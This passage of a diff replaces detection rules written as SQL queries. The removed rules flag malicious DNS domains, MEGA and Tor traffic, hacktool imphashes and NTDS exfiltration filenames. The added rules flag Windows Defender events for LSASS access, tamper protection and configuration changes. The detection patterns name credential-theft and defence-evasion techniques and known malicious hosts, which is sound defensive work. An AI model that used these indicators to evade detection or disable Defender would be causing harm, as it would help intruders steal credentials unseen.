'%sbmsa.wiki%' ESCAPE '\\' OR QueryName LIKE '%sourceslabs.com%' ESCAPE '\\' OR QueryName LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR QueryName LIKE '%zacharryblogs.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" ], - "filename": "dns_query_win_malware_3cx_compromise.yml" + "filename": 
"win_defender_psexec_wmi_asr.yml" }, { - "title": "DNS Query for MEGA.io Upload Domain - Sysmon", - "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", - "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "title": "LSASS Access Detected via Attack Surface Reduction", + "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", + "status": "experimental", + "description": "Detects Access to LSASS Process", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' 
OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "dns_query_win_mega_nz.yml" + "filename": "win_defender_alert_lsass_access.yml" }, { - "title": "DNS Query Tor Onion Address - Sysmon", - "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "title": "Win Defender Restored Quarantine File", + "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "status": "experimental", - "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", - "author": "frack113", + "description": "Detects the restoration of files from the defender quarantine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrator activity restoring a file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%.onion%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" ], - "filename": "dns_query_win_tor_onion.yml" + "filename": "win_defender_restored_quarantine_file.yml" }, { - "title": "Potential SocGholish Second Stage C2 DNS Query", - "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", - "status": "experimental", - "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", - "author": "Dusty Miller", + "title": "Windows Defender Threat Detected", + "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "status": "stable", + "description": "Detects all actions taken by Windows Defender malware detection engines", + "author": "Ján Trenčanský", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate domain names matching the regex 
pattern by chance (e.g. domain controllers dc01.company.co.uk)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" ], - "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" + "filename": "win_defender_threat.yml" }, { - "title": "Hacktool Download", - "id": "19b041f6-e583-40dc-b842-d6fa8011493f", - "status": "experimental", - "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender AMSI Trigger Detected", + "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "status": "stable", + "description": "Detects triggering of AMSI by Windows Defender.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', 
'6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', 
'41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" ], - "filename": "create_stream_hash_hacktool_download.yml" + "filename": "win_defender_amsi_trigger.yml" }, { - "title": "Unusual File Download from Direct IP Address", - "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "title": "Windows Defender Exploit Guard Tamper", + "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", "status": "experimental", - "description": "Detects the download of suspicious file type from URLs with IP", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Contents REGEXP 
'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" ], - "filename": "create_stream_hash_susp_ip_domains.yml" + "filename": "win_defender_exploit_guard_tamper.yml" }, { - "title": "Exports Registry Key To an Alternate Data Stream", - "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", - "status": "test", - "description": "Exports the target Registry key and hides it in the specified alternate data stream.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Microsoft Defender Tamper Protection Trigger", + "id": "49e5bc24-8b86-49f1-b743-535f332c2856", + "status": "stable", + "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", + 
"author": "Bhabesh Raj, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator might try to disable defender features during testing (must be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" ], - "filename": "create_stream_hash_regedit_export_to_ads.yml" + "filename": "win_defender_tamper_protection_trigger.yml" }, { - "title": "Suspicious File Download From File Sharing Websites", - "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", - "status": "experimental", - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender Suspicious Configuration Changes", + "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", + "status": "stable", + "description": "Detects suspicious changes to the windows defender configuration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator activity (must be 
investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows 
Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" ], - "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" + "filename": "win_defender_suspicious_features_tampering.yml" }, { - "title": "Suspicious NTDS Exfil Filename Patterns", - "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", - "status": "test", - "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", + "title": "BITS Transfer Job Download To Potential Suspicious Folder", + "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "status": "experimental", + "description": "Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "file_event_win_ntds_exfil_tools.yml" + "filename": "win_bits_client_new_trasnfer_susp_local_folder.yml" }, { - "title": "Office Template Creation", - "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "title": "BITS Transfer Job Download From Direct IP", + "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", "status": "experimental", - "description": "Detects creation of template files for Microsoft Office from outside Office", - 
